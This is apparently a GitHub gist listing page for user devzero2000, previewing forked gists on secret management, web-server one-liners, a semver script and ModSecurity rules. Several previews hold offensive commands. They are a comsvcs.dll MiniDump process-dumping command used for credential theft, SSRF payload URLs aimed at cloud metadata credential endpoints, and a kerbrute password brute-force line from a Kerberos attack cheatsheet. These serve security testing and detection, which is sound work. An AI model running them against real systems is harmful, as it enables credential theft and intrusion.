Skip to content

Instantly share code, notes, and snippets.

@devzero2000
devzero2000 / infra-secret-management-overview.md
Created September 19, 2023 08:36 — forked from maxvt/infra-secret-management-overview.md
Infrastructure Secret Management Software Overview

Currently, there is an explosion of tools that aim to manage secrets for automated, cloud native infrastructure management. Daniel Somerfield did some work classifying the various approaches, but (as far as I know) no one has made a recent effort to summarize the various tools.

This is an attempt to give a quick overview of what can be found out there. The list is alphabetical. There will be tools that are missing, and some of the facts might be wrong--I welcome your corrections. For the purpose, I can be reached via @maxvt on Twitter, or just leave me a comment here.

There is a companion feature matrix of various tools. Comments are welcome in the same manner.

@devzero2000
devzero2000 / examples.txt
Created February 23, 2023 10:59 — forked from JohnLaTwC/examples.txt
comsvcs MiniDump examples
By @JohnLaTwC
References:
https://risksense.com/blog/hidden-gems-in-windows-the-hunt-is-on/ by Jenna Magius and Nate Caroe (@RiskSense)
https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
https://twitter.com/SBousseaden/status/1407742041170268166 - Calling MiniDump export by ordinal examples: (comsvcs,#24)
Detection Examples:
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump <PID> \Windows\Temp\<filename>.dmp full
@devzero2000
devzero2000 / cloud_metadata.txt
Created May 13, 2022 17:06 — forked from mosesrenegade/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
http://[fd00:ec2::254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
@devzero2000
devzero2000 / check_semver.sh
Created March 13, 2022 19:09 — forked from rverst/check_semver.sh
Bash script for checking a semantic version
#!/usr/bin/env bash
# https://gist.github.com/rverst/1f0b97da3cbeb7d93f4986df6e8e5695
function chsv_check_version() {
if [[ $1 =~ ^(0|[1-9][0-9]*)\.(0|[1-9][0-9]*)\.(0|[1-9][0-9]*)(-((0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*)(\.(0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*))*))?(\+([0-9a-zA-Z-]+(\.[0-9a-zA-Z-]+)*))?$ ]]; then
echo "$1"
else
echo ""
fi
}
@devzero2000
devzero2000 / modsec.rules
Created March 10, 2022 07:15 — forked from nopslider/modsec.rules
ModSec Rule Examples
# Redirect to a different page when a PHP file is uploaded
SecRule FILES "(?i)\.php$" "t:none,log,redirect:http://cyberis.co.uk,msg:'PHP file upload blocked',id:1"
# Deny when a semi-colon is found in the 'ip' parameter
SecRule ARGS:ip ";" "t:none,log,deny,msg:'semi colon test',id:2"
# Disable ModSecurity for a given page - NOTE THE ESCAPE OF THE '?'
SecRule REQUEST_URI "/joomla/index.php/component/users/\?task=registration.register" "allow,id:3"
@devzero2000
devzero2000 / kerberos_attacks_cheatsheet.md
Created September 11, 2021 22:00 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@devzero2000
devzero2000 / web-servers.md
Created May 14, 2021 17:47 — forked from willurd/web-servers.md
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000